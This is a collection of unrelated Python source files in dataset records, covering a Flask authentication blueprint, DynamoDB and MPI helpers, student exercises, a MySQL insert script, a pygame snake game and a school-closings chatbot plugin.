+{"seq_id":"440974174","text":"from datetime import datetime\nfrom datetime import timedelta\nfrom email_validator import validate_email\nfrom email_validator import EmailNotValidError\nfrom flask import current_app as app\nfrom flask import request\nfrom flask import Blueprint\n#\nfrom social_network import db\nfrom social_network.security import hash_password\nfrom social_network.security import compare_passwords\nfrom social_network.security import generate_jwt\nfrom social_network.security import parse_user_agent\nfrom social_network.security import generate_refresh_token\nfrom social_network.security import jwt_auth\nfrom social_network.other import record_activity\nfrom social_network.errors import ApplicationError\nfrom social_network.domain_models import User\nfrom social_network.domain_models import UserProfile\nfrom social_network.domain_models import RefreshToken\n\nfrom .payload_models import UserSignupPayload\nfrom .payload_models import UserSigninPayload\nfrom .payload_models import RefreshTokenPayload\n\n\napi = Blueprint(\"auth\", __name__)\n\n\n@api.route(\"/api/email-lookup\", methods=[\"GET\"])\n@record_activity()\ndef email_lookup(*args, **kwargs):\n try:\n user_email = validate_email(request.args[\"email\"]).email\n except EmailNotValidError:\n return {\"value\": False}\n\n user = (\n db.session.query(User)\n .filter(User.email==user_email)\n .filter(User.deleted_at.is_(None))\n .first()\n )\n\n return (\n {\"status\": \"ok\", \"value\": False}\n if user is None else\n {\"status\": \"ok\", \"value\": True}\n )\n\n\n@api.route(\"/api/signup\", methods=[\"POST\"])\n@record_activity()\ndef signup(*args, **kwargs):\n now = datetime.now()\n user_payload = UserSignupPayload(**request.get_json())\n\n # === does the user with the received email exist ===\n\n existing_user = (\n db.session.query(User)\n .filter(User.email==user_payload.email)\n .filter(User.deleted_at.is_(None))\n .first()\n )\n\n if existing_user is not None:\n raise ApplicationError(\n f\"User with email - {user_payload.email} - already exist!\",\n code=400\n )\n\n # === hashing password and creating new user ===\n\n hashed_passw = hash_password(user_payload.password.get_secret_value())\n\n new_user = User(\n email=user_payload.email,\n password=hashed_passw,\n created_at=now\n )\n new_user.profile = UserProfile(\n first_name = user_payload.first_name,\n last_name = user_payload.last_name,\n full_name = f\"{user_payload.first_name} {user_payload.last_name}\",\n sex = user_payload.sex,\n country = user_payload.country,\n city = user_payload.city,\n birthday = user_payload.birthday,\n phone = user_payload.phone,\n created_at = now\n )\n\n db.session.add(new_user)\n db.session.commit()\n\n return {\"status\": \"ok\", \"value\": new_user.id}\n\n\n@api.route(\"/api/signin\", methods=[\"POST\"])\n@record_activity()\ndef signin(*args, **kwargs):\n ua_header = request.headers.get(\"User-Agent\", \"\")\n user_agent = parse_user_agent(ua_header)\n\n signin_payload = UserSigninPayload(**request.get_json())\n\n # === does the user with the received email exist ===\n\n user = (\n db.session.query(User)\n .filter(User.email==signin_payload.email)\n .filter(User.deleted_at.is_(None))\n .first()\n )\n \n if user is None:\n raise ApplicationError(\n f\"Access denied. 
User with email - {signin_payload.email} - does not exist!\",\n code=403\n )\n\n # === verifying the received password ===\n\n if compare_passwords(signin_payload.password.get_secret_value(), user.password):\n\n # the password is correct; generating jwt and refresh tokens\n \n now = datetime.now()\n jwt_token_ttl = app.config[\"JWT_TOKEN_POLICY\"][\"TOKEN_EXPIRES_IN\"]\n refresh_token_ttl = app.config[\"JWT_TOKEN_POLICY\"][\"REFRESH_TOKEN_EXPIRES_IN\"]\n jwt_token_expires_at = now + timedelta(seconds=jwt_token_ttl)\n refresh_token_expires_at = now + timedelta(seconds=refresh_token_ttl)\n\n refresh_token = RefreshToken(\n token=generate_refresh_token(),\n exp=refresh_token_expires_at,\n os=user_agent[\"os\"],\n device=user_agent[\"device\"],\n browser=user_agent[\"browser\"],\n created_at=now\n )\n\n db.session.add(refresh_token)\n db.session.commit()\n\n jwt_payload = {\n \"usrid\": user.id,\n \"usrrole\": user.security_role,\n \"exp\": jwt_token_expires_at,\n **user_agent\n }\n jwt_token = generate_jwt(\n jwt_payload,\n app.config[\"JWT_TOKEN_POLICY\"]\n )\n\n return {\n \"token\": jwt_token,\n \"refresh_token\": refresh_token.token,\n \"expires_at\": int(jwt_token_expires_at.timestamp() * 1000),\n \"refresh_token_expires_at\": int(refresh_token_expires_at.timestamp() * 1000)\n }, 200\n\n else:\n raise ApplicationError(\n \"Access denied. Incorrect password\",\n code=403\n )\n\n\n@api.route(\"/api/refresh-token\", methods=[\"POST\"])\n@jwt_auth(can_be_expired=True)\n@record_activity()\ndef refresh_jwt_token(*args, **kwargs):\n now = datetime.now()\n\n user = kwargs[\"user\"] # from the jwt_auth decorator\n user_agent = kwargs[\"user_agent\"] # from the jwt_auth decorator\n token_payload = RefreshTokenPayload(**request.get_json())\n\n # === does the refresh token exist in db ===\n\n refresh_token = (\n db.session.query(RefreshToken)\n .filter(RefreshToken.token == token_payload.refresh_token.get_secret_value())\n .filter(RefreshToken.deleted_at.is_(None))\n .first()\n )\n\n if refresh_token is None:\n raise ApplicationError(\"Invalid refresh token\", code=403)\n\n # === is the refresh token expired ===\n\n if refresh_token.exp < now:\n refresh_token.deleted_at = now\n db.session.commit()\n raise ApplicationError(\"Refresh token expired\", code=403)\n\n # === generating new jwt token ===\n\n jwt_token_ttl = app.config[\"JWT_TOKEN_POLICY\"][\"TOKEN_EXPIRES_IN\"]\n jwt_token_expires_at = now + timedelta(seconds=jwt_token_ttl)\n\n jwt_payload = {\n \"usrid\": user.id,\n \"usrrole\": user.security_role,\n \"exp\": jwt_token_expires_at,\n **user_agent\n }\n jwt_token = generate_jwt(\n jwt_payload,\n app.config[\"JWT_TOKEN_POLICY\"]\n )\n\n return {\n \"token\": jwt_token,\n \"expires_at\": int(jwt_token_expires_at.timestamp() * 1000),\n }, 200\n","sub_path":"src/social_network/blueprints/auth/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":6566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
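The `hash_password` / `compare_passwords` helpers imported at the top of the record above live in `social_network.security`, which is not shown. Purely as a hedged sketch of what such helpers could look like (an assumption, not the project's actual implementation), using only the standard library:

```python
import hashlib
import hmac
import os

def hash_password(password: str) -> bytes:
    # hypothetical scheme: 16-byte random salt + PBKDF2-HMAC-SHA256 digest
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt + digest

def compare_passwords(password: str, stored: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison
```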
+{"seq_id":"645960737","text":"#__author__ = 'lizhifeng'\n#coding=utf-8\n\nfrom aws4_signature import GetDynamodbClient\n# from utility import binary2string\n\n\ndef batch_get(client, pid_pn, table_name, table_range_name=\"\", table_key_name=\"patent_id\",\n fields_type=None, table_range=\"\", batch=10):\n _request = {table_name: {}}\n _request[table_name][\"Keys\"] = []\n if fields_type:  # fields_type defaults to None, so avoid calling len() on it\n project_expression = \",\".join(fields_type)\n _request[table_name][\"ProjectionExpression\"] = project_expression\n\n rlt = []\n\n i = 0\n count = 0\n patent_num = len(pid_pn)\n patent_ids = pid_pn.keys()\n for patent_id in patent_ids:\n\n key_dict = {table_key_name: {}}\n key_dict[table_key_name][\"S\"] = patent_id\n\n _request[table_name][\"Keys\"].append(key_dict)\n if table_range != \"\":\n _request[table_name][\"Keys\"][i][\"lang\"] = {\"S\": table_range}  # was the builtin range, a bug\n\n i += 1\n count += 1\n\n if i == batch or count == patent_num:\n\n # print _request\n _response = client.batch_get_item(RequestItems=_request)\n rlt.append(_response)\n\n # parse_batch_get(_response, rlt, table_name, table_range_name, table_key_name, fields_type)\n\n i = 0\n _request[table_name][\"Keys\"] = []\n\n return rlt\n\n\ndef parse_batch_get(response, rlt, table_name, table_range_name=\"\", table_key=\"patent_id\", field_type_dict=None):\n\n _fields = field_type_dict.keys() if field_type_dict else []\n for item in response[\"Responses\"][table_name]:\n\n _key = item[table_key][\"S\"]\n if table_range_name != \"\":\n _range = item[table_range_name][\"S\"]\n _key += _range\n\n for _field in _fields:\n _type = field_type_dict[_field]\n _content = item[_field][_type]\n rlt[_field][_key] = _content\n\n","sub_path":"collection/ml/landscape/dynamodb_api.py","file_name":"dynamodb_api.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
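A hypothetical usage sketch for the two functions above. The table and field names are invented, and the client is assumed to be a boto3-compatible low-level DynamoDB client, since `GetDynamodbClient` is not shown:

```python
import boto3

client = boto3.client("dynamodb", region_name="us-east-1")

pid_pn = {"US1234567A": "1234567", "US7654321B": "7654321"}   # invented IDs
fields_type = {"patent_id": "S", "title": "S"}                 # field -> DynamoDB type

responses = batch_get(client, pid_pn, table_name="patents",
                      fields_type=fields_type, batch=10)

# parse_batch_get fills a dict-of-dicts keyed by field name, then by item key
rlt = {field: {} for field in fields_type}
for response in responses:
    parse_batch_get(response, rlt, "patents", field_type_dict=fields_type)
```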
+{"seq_id":"460937427","text":"from functools import reduce\n\nwhile True:\n unique = None\n non_unique = None\n p = ''\n p2 = ''\n\n my_list1 = input()\n if my_list1 == 'stop playing':\n break\n my_list = list(map(int, my_list1.split()))\n\n if len(my_list) > len(set(my_list)):\n non_unique = my_list\n for a in range(0, len(non_unique)):\n if non_unique[a] % 2 != 0:\n non_unique[a] += 3\n non_unique.sort()\n for n in non_unique:\n p += str(n)\n p += ':'\n p1 = p[:-1]\n print(f'Non-unique list: {p1}')\n sum = reduce(lambda x, y: x + y, non_unique)\n sum1 = sum / len(non_unique)\n print(f'Output: {sum1:.2f}')\n else:\n unique = my_list\n for b in range(0, len(unique)):\n if unique[b] % 2 == 0:\n unique[b] += 2\n unique.sort()\n for n in unique:\n p2 += str(n)\n p2 += ','\n p3 = p2[:-1]\n print(f'Unique list: {p3}')\n sum3 = reduce(lambda x, y: x + y, unique)\n sum4 = sum3 / len(unique)\n print(f'Output: {sum4:.2f}')\n\n\n\n\n\n\n\n","sub_path":"PythonFundamentals/Exam_Prep_2/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"358925703","text":"\"\"\"\nAuxiliary functions and variables for dealing with MPI multiprocessing\n\nWarning:\n These functions are mostly no-ops unless MPI is properly installed and python code\n was started using :code:`mpirun` or :code:`mpiexec`. Please refer to the\n documentation of your MPI distribution for details.\n\n.. autosummary::\n :nosignatures:\n\n mpi_send\n mpi_recv\n mpi_allreduce\n\n.. codeauthor:: David Zwicker \n\"\"\"\n\nimport os\nimport sys\nfrom numbers import Number\nfrom typing import TYPE_CHECKING, Union\n\nimport numpy as np\nfrom numba.core import types\nfrom numba.extending import overload, register_jitable\n\nfrom .numba import jit\n\nif TYPE_CHECKING:\n from numba_mpi import Operator # @UnusedImport\n\n# Initialize assuming that we run serial code if `numba_mpi` is not available\ninitialized: bool = False\n\"\"\"bool: Flag determining whether mpi was initialized (and is available)\"\"\"\n\nsize: int = 1\n\"\"\"int: Total process count\"\"\"\n\nrank: int = 0\n\"\"\"int: ID of the current process\"\"\"\n\n# read state of the current MPI node\ntry:\n import numba_mpi\n\nexcept ImportError:\n # package `numba_mpi` could not be loaded\n if int(os.environ.get(\"PMI_SIZE\", \"1\")) > 1:\n # environment variable indicates that we are in a parallel program\n sys.exit(\n \"WARNING: Detected multiprocessing run, but could not import python \"\n \"package `numba_mpi`\"\n )\n\nelse:\n # we have access to MPI\n initialized = numba_mpi.initialized()\n size = numba_mpi.size()\n rank = numba_mpi.rank()\n\nparallel_run: bool = size > 1\n\"\"\"bool: Flag indicating whether the current run is using multiprocessing\"\"\"\n\nis_main: bool = rank == 0\n\"\"\"bool: Flag indicating whether the current process is the main process (with ID 0)\"\"\"\n\n\n@jit\ndef mpi_send(data, dest: int, tag: int) -> None:\n \"\"\"send data to another MPI node\n\n Args:\n data: The data being sent\n dest (int): The ID of the receiving node\n tag (int): A numeric tag identifying the message\n \"\"\"\n status = numba_mpi.send(data, dest, tag)\n assert status == 0\n\n\n@jit()\ndef mpi_recv(data, source, tag) -> None:\n \"\"\"receive data from another MPI node\n\n Args:\n data: A buffer into which the received data is written\n source (int): The ID of the sending node\n tag (int): A numeric tag identifying the message\n\n \"\"\"\n status = numba_mpi.recv(data, source, tag)\n assert status == 0\n\n\n@register_jitable\ndef _allreduce(sendobj, recvobj, operator: Union[int, \"Operator\", None] = None) -> int:\n \"\"\"helper function that calls `numba_mpi.allreduce`\"\"\"\n if operator is None:\n return numba_mpi.allreduce(sendobj, recvobj) # type: ignore\n else:\n return numba_mpi.allreduce(sendobj, recvobj, operator) # type: ignore\n\n\ndef mpi_allreduce(data, operator: Union[int, \"Operator\", None] = None):\n \"\"\"combines data from all MPI nodes\n\n Note that complex datatypes and user-defined functions are not properly supported.\n\n Args:\n data:\n Data being sent from this node to all others\n operator:\n The operator used to combine all data. 
Possible options are summarized in\n the IntEnum :class:`numba_mpi.Operator`.\n\n Returns:\n The accumulated data\n \"\"\"\n from mpi4py import MPI\n\n if isinstance(data, Number):\n # reduce a single number\n sendobj = np.array([data])\n recvobj = np.empty((1,), sendobj.dtype)\n status = _allreduce(sendobj, recvobj, operator)\n if status != 0:\n raise MPI.Exception(status)\n return recvobj[0]\n\n elif isinstance(data, np.ndarray):\n # reduce an array\n recvobj = np.empty(data.shape, data.dtype)\n status = _allreduce(data, recvobj, operator)\n if status != 0:\n raise MPI.Exception(status)\n return recvobj\n\n else:\n raise TypeError(f\"Unsupported type {data.__class__.__name__}\")\n\n\n@overload(mpi_allreduce)\ndef ol_mpi_allreduce(data, operator: Union[int, \"Operator\", None] = None):\n \"\"\"overload the `mpi_allreduce` function\"\"\"\n\n if isinstance(data, types.Number):\n\n def impl(data, operator=None):\n \"\"\"reduce a single number across all cores\"\"\"\n sendobj = np.array([data])\n recvobj = np.empty((1,), sendobj.dtype)\n status = _allreduce(sendobj, recvobj, operator)\n assert status == 0\n return recvobj[0]\n\n elif isinstance(data, types.Array):\n\n def impl(data, operator=None):\n \"\"\"reduce an array across all cores\"\"\"\n recvobj = np.empty(data.shape, data.dtype)\n status = _allreduce(data, recvobj, operator)\n assert status == 0\n return recvobj\n\n else:\n raise TypeError(f\"Unsupported type {data.__class__.__name__}\")\n\n return impl\n","sub_path":"pde/tools/mpi.py","file_name":"mpi.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
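A short usage sketch for `mpi_allreduce` from the record above: summing each rank's ID across all processes. This assumes `numba-mpi` and `mpi4py` are installed, that the module path matches this file's location in py-pde, and that the script is launched with something like `mpiexec -n 4 python script.py`:

```python
import numpy as np
from pde.tools import mpi

local = np.array([float(mpi.rank)])   # each process contributes its own rank
total = mpi.mpi_allreduce(local)      # default operator is the MPI sum
if mpi.is_main:
    print("sum of all ranks:", total[0])
```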
+{"seq_id":"505506156","text":"from abc import abstractmethod\n\nimport numpy as np\n\n\nclass Survival:\n \"\"\"\n The survival process is implemented by inheriting from this class; a subclass\n selects only specific individuals from a population to survive.\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n\n def do(self, pop, n_survive, **kwargs):\n return self._do(pop, n_survive, **kwargs)\n\n @abstractmethod\n def _do(self, pop, n_survive, **kwargs):\n pass\n\n\ndef split_by_feasibility(pop, sort_infeasbible_by_cv=True):\n # if no constraint violation is provided\n if pop.CV is None:\n return np.arange(pop.size()), np.array([])\n\n feasible, infeasible = [], []\n\n for i in range(pop.size()):\n if pop.CV[i, 0] <= 0:\n feasible.append(i)\n else:\n infeasible.append(i)\n\n if sort_infeasbible_by_cv:\n infeasible = sorted(infeasible, key=lambda i: pop.CV[i,:])\n\n return np.array(feasible), np.array(infeasible)\n","sub_path":"pymoo/model/survival.py","file_name":"survival.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
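A minimal sketch of a concrete `Survival` subclass for the record above: keep the `n_survive` individuals with the best (lowest) first objective. The `Population` interface used here, an `F` objective matrix and integer-array indexing, is assumed for illustration; pymoo's real classes differ in details:

```python
import numpy as np

class FitnessSurvival(Survival):
    def _do(self, pop, n_survive, **kwargs):
        order = np.argsort(pop.F[:, 0])   # ascending objective value
        return pop[order[:n_survive]]     # best n_survive individuals survive
```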
+{"seq_id":"533529482","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of INSPIRE.\n# Copyright (C) 2016 CERN.\n#\n# INSPIRE is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of the\n# License, or (at your option) any later version.\n#\n# INSPIRE is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n#\n# In applying this licence, CERN does not waive the privileges and immunities\n# granted to it by virtue of its status as an Intergovernmental Organization\n# or submit itself to any jurisdiction.\n\n\"\"\"Search factory for INSPIRE workflows UI.\n\nWe specify in this custom search factory which fields elasticsearch should\nreturn in order to not always return the entire record.\n\nAdd a key path to the includes variable to include it in the API output when\nlisting/searching across workflow objects (Holding Pen).\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom invenio_workflows_ui.search import default_search_factory\n\n\ndef holdingpen_search_factory(self, search, **kwargs):\n \"\"\"Override search factory.\"\"\"\n search, urlkwargs = default_search_factory(self, search, **kwargs)\n includes = [\n 'metadata.titles', 'metadata.abstracts', 'metadata.field_categories',\n 'metadata.authors', 'metadata.name', 'metadata.positions', 'metadata.acquisition_source',\n '_workflow', '_extra_data.relevance_prediction',\n '_extra_data.user_action',\n '_extra_data.classifier_results.complete_output'\n ]\n search = search.extra(_source={\"include\": includes})\n return search, urlkwargs\n","sub_path":"inspirehep/modules/workflows/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"636373505","text":"#!/usr/bin/env python3\n\nimport multiprocessing as mp\n\n\ndef addTwoNumbers(a, b, q):\n # time.sleep(5) # In case you want to slow things down to see what is happening.\n q.put(a+b)\n\n\ndef addTwoPar():\n x = int(input(\"Enter first number: \"))\n y = int(input(\"Enter second number: \"))\n\n q = mp.Queue()\n p1 = mp.Process(target=addTwoNumbers, args=(x, y, q))\n p2 = mp.Process(target=addTwoNumbers, args=(x, y, q))\n p1.start()\n p2.start()\n result1 = q.get()\n result2 = q.get()\n print(result1+result2)\n\n\ndef main():\n addTwoPar()\n\n\nif __name__ == '__main__':\n main()","sub_path":"year2_1819/operating_systems/labs/lab2_multiprocessing/add_two_nums.py","file_name":"add_two_nums.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550956923","text":"##\n## Python Programming\n## ===========================================================================\n##\n## Generate a list of tuples, where each tuple contains, in its first\n## position, the value of the second column; the second part of the\n## tuple is a list with the letters (sorted and without repeated letters)\n## from the first column that appear associated with that value of the\n## second column. That is:\n##\n## Answer:\n## ('0', ['C'])\n## ('1', ['A', 'B', 'D', 'E'])\n## ('2', ['A', 'D', 'E'])\n## ('3', ['A', 'B', 'D', 'E'])\n## ('4', ['B', 'E'])\n## ('5', ['B', 'C', 'D', 'E'])\n## ('6', ['A', 'B', 'C', 'E'])\n## ('7', ['A', 'C', 'D', 'E'])\n## ('8', ['A', 'B', 'E'])\n## ('9', ['A', 'B', 'C', 'E'])\n##\n## >>> Write your code from this point on <<<\n##\nimport csv\nwith open('data.csv', 'r') as file:\n text = csv.reader(file, delimiter=',')\n lista = [] \n for row in text:\n lista.append(row[0])\ntext = [i.split('\\t') for i in lista]\ndicc = {}\nfor elemento in text:\n if elemento[1] in dicc.keys():\n if elemento[0] not in dicc[elemento[1]]:\n dicc[elemento[1]].append(elemento[0])\n else:\n dicc[elemento[1]] = [elemento[0]]\n##dic1={text:sorted(dicc[text]) for text in dicc.keys()}\narreglo = sorted(dicc, key=str.lower)\nfor i in arreglo:\n print((i,(sorted(dicc[i]))))","sub_path":"03-python=1/q08=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"548838603","text":"# **Problem 0002**: Save the 200 activation codes (or coupons) generated in problem 0001 into a **MySQL** relational database.\n\nimport pymysql.cursors\n\n\ndef store_mysql(filepath):\n connection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"1234\", db=\"show_me_the_code\")\n\n try:\n with connection.cursor() as cursor:\n # Check whether the table already exists\n cursor.execute('show tables')\n tables = cursor.fetchall()\n findtables = False\n for table in tables:\n if 'code' in table:\n findtables = True\n print(\"the table already exists\")\n if not findtables:\n cursor.execute('''\n CREATE TABLE code(\n id INT NOT NULL AUTO_INCREMENT,\n code VARCHAR(20) NOT NULL,\n PRIMARY KEY (id));\n ''')\n\n with open(filepath, 'rb') as f:\n for line in f.readlines():\n code = line.strip() # use strip() to drop the trailing newline\n cursor.execute(\"INSERT INTO code (code) VALUES (%s);\", code)\n\n connection.commit()\n finally:\n connection.close()\n\n\nif __name__ == '__main__':\n store_mysql('code-result.txt')\n","sub_path":"python-learn/show-me-the-code/0002-save-to-mysql.py","file_name":"0002-save-to-mysql.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"351653619","text":"# Teknath krishna jha \n# Walchand college of engineering sangli\n# CSE\n# All dimensions are taken as per poco f1 \n\n# Basic window setup \n# part 1\n\nimport pygame\nimport random\nimport sys  # needed by myquit() below\n\n# initializing pygame\npygame.init()\n\n# colors\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\ngreen = (0,255,0)\nblue = (0,0,255)\nyellow = (255,255,0)\n\n# border thickness and window surface size\nwidth=90\nwindow_width =1080\n\nwindow_height =1500\n\n\n\n\ngameDisplay = pygame.display.set_mode((window_width , window_height))\n\n\n# window name \npygame.display.set_caption('$n@ke g@me Teknath jha')\n\n# text font \nfont = pygame.font.SysFont(None , 25 , bold=True)\n\n# on quit \ndef myquit():\n\tpygame.quit()\n\tsys.exit()\n\nclock = pygame.time.Clock()\nFPS = 5\nblockSize = 50\nnoPixel = 0\n\n'''\nsizeGrd = window_width // blockSize\nrow = 0\ncol = 0\nfor nextline in range(sizeGrd):\n'''\n\n# part 2\n# function to draw each block of the snake\ndef snake(blockSize, snakelist):\n\n #x = 250 - (segment_width + segment_margin) * i\n i=1\n\n for size in snakelist:\n if i==1:\n i=0\n pygame.draw.rect(gameDisplay, blue ,[size[0]+5,size[1],blockSize,blockSize],100)\n else:\n i=1\n pygame.draw.rect(gameDisplay, black ,[size[0]+5,size[1],blockSize,blockSize])\n \n\ndef message_to_screen(msg, color):\n # render bold text; the background is cyan\n screen_text = font.render(msg, True, 'red' ,'cyan')\n # position of text on surface \n gameDisplay.blit(screen_text, [((window_width)/2)-350, ((window_height)/2) -50])\n\n # part 3\ndef gameLoop():\n\n # game status\n\n\n gameExit = False\n gameOver = False\n\n lead_x = (window_width+width)/2\n lead_y = (window_height+width)/2\n\n change_pixels_of_x = 0\n change_pixels_of_y = 0\n \n # Initial snake dimension\n snakelist = []\n snakeLength = 1\n\n # food position\n # round for round off values for integer \n randomAppleX = round(random.randrange(0, (window_width-width)-blockSize)/10.0)*10.0\n randomAppleY = round(random.randrange(0, (window_height-width)-blockSize)/10.0)*10.0\n\n\n while not gameExit:\n # The loop below runs once the game is over\n while gameOver == True:\n gameDisplay.fill(white)\n message_to_screen(\"Game over, press c to play again or Q to quit\", red)\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameOver = False\n gameExit = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n gameExit = True\n gameOver = False\n if event.key == pygame.K_c:\n gameLoop()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameExit = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n myquit()\n\n # windows\n # leftArrow = event.key == pygame.K_LEFT\n # rightArrow = event.key == pygame.K_RIGHT\n # upArrow = event.key == pygame.K_UP\n # downArrow = event.key == pygame.K_DOWN\n\n\n # Androids\n leftArrow = event.key == pygame.K_4 \n rightArrow = event.key ==pygame.K_6 \n upArrow = event.key == pygame.K_2 \n downArrow = event.key == pygame.K_8 \n # for user speed self exceeding \n # speed = event.key == pygame.K_5 \n\n # Update the movement delta by one block in the chosen direction (left, right, up, down)\n if leftArrow:\n change_pixels_of_x = -blockSize\n change_pixels_of_y = noPixel\n elif rightArrow:\n change_pixels_of_x = blockSize\n change_pixels_of_y = noPixel\n elif upArrow:\n change_pixels_of_y = -blockSize\n change_pixels_of_x = noPixel\n elif downArrow:\n change_pixels_of_y = blockSize\n change_pixels_of_x = 
noPixel\n\n if lead_x >= (window_width-width) or lead_x < 0+width or lead_y >= (window_height-width) or lead_y < 0+width:\n gameOver = True\n\n lead_x += change_pixels_of_x\n lead_y += change_pixels_of_y\n\n gameDisplay.fill('cyan')\n\n\n AppleThickness = 50\n # Log the food position and size to the terminal\n print([int(randomAppleX),int(randomAppleY),AppleThickness,AppleThickness])\n pygame.draw.rect(gameDisplay, red, [randomAppleX,randomAppleY,AppleThickness,AppleThickness])\n\n allspriteslist = []\n allspriteslist.append(lead_x)\n allspriteslist.append(lead_y)\n snakelist.append(allspriteslist)\n\n if len(snakelist) > snakeLength:\n del snakelist[0]\n\n for eachSegment in snakelist [:-1]:\n if eachSegment == allspriteslist:\n gameOver = True\n\n snake(blockSize, snakelist)\n\n# border \n # left most \n pygame.draw.rect(gameDisplay,yellow,[0,0,width,window_height])\n # right most \n pygame.draw.rect(gameDisplay,yellow,[window_width-width,0,width,window_height])\n # bottom most\n pygame.draw.rect(gameDisplay,yellow,[0,window_height-width,window_width,width])\n # top most \n pygame.draw.rect(gameDisplay,yellow,[0,0,window_width,width])\n\n\n pygame.display.update() \n\n# Comparison of the food and snake head positions\n if lead_x >= (randomAppleX - AppleThickness) and lead_x <= (randomAppleX + AppleThickness-2):\n\n if lead_y >= (randomAppleY - AppleThickness) and lead_y <= (randomAppleY + AppleThickness-2):\n\n randomAppleX = round(random.randrange(0+width, (window_width-width)-blockSize)/10.0)*10.0\n\n randomAppleY = round(random.randrange(0+width, (window_height-width)-blockSize)/10.0)*10.0\n # finally snake ate food \n snakeLength += 1 \n\n# Frames per second; here it is 5 FPS\n\n clock.tick(FPS)\n\n pygame.quit()\n quit()\n\n# Calling \n\ngameLoop()\n\n","sub_path":"computer snake game.py","file_name":"computer snake game.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"455474913","text":"import plugins\nimport json\nfrom requests import get\nfrom control import *\nfrom bs4 import BeautifulSoup\n\n\ndef _initialise():\n plugins.register_user_command(['fcps', 'lcps'])\n\n\ndef lcps(bot, event, *args):\n '''This command checks for school closings in the Loudon County Public Schools area. Data taken from NBC.'''\n try:\n r = get('http://www.nbcwashington.com/weather/school-closings/')\n html = r.text\n soup = BeautifulSoup(html, 'html.parser')\n schools = []\n for school in soup.find_all('p'):\n schools.append(school.text)\n\n for i in range(len(schools)):\n if 'Loudoun County' in schools[i]:\n check = str(schools[i])\n status = check.replace('Loudoun County Schools', '')\n msg = _('LCPS is {}').format(status)\n yield from bot.coro_send_message(event.conv, msg)\n except BaseException as e:\n simple = _('An Error Occurred')\n msg = _('{} -- {}').format(str(e), event.text)\n yield from bot.coro_send_message(event.conv, simple)\n yield from bot.coro_send_message(CONTROL, msg)\n\n\ndef fcps(bot, event, *args):\n '''This command checks for closings in the Fairfax County Public Schools Area. Data taken from TJHSST.'''\n try:\n page = get('https://ion.tjhsst.edu/api/emerg?format=json')\n data = json.loads(page.text)\n status = data['status']\n if status:\n message = data['message']\n message = message.replace('
', '')\n message = message.replace('
', '')\n msg = _(message)\n else:\n msg = _('FCPS is open')\n yield from bot.coro_send_message(event.conv, msg)\n except BaseException as e:\n simple = _('An Error Occurred')\n msg = _('{} -- {}').format(str(e), event.text)\n yield from bot.coro_send_message(event.conv, simple)\n yield from bot.coro_send_message(CONTROL, msg)\n","sub_path":"hangupsbot/plugins/closings.py","file_name":"closings.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
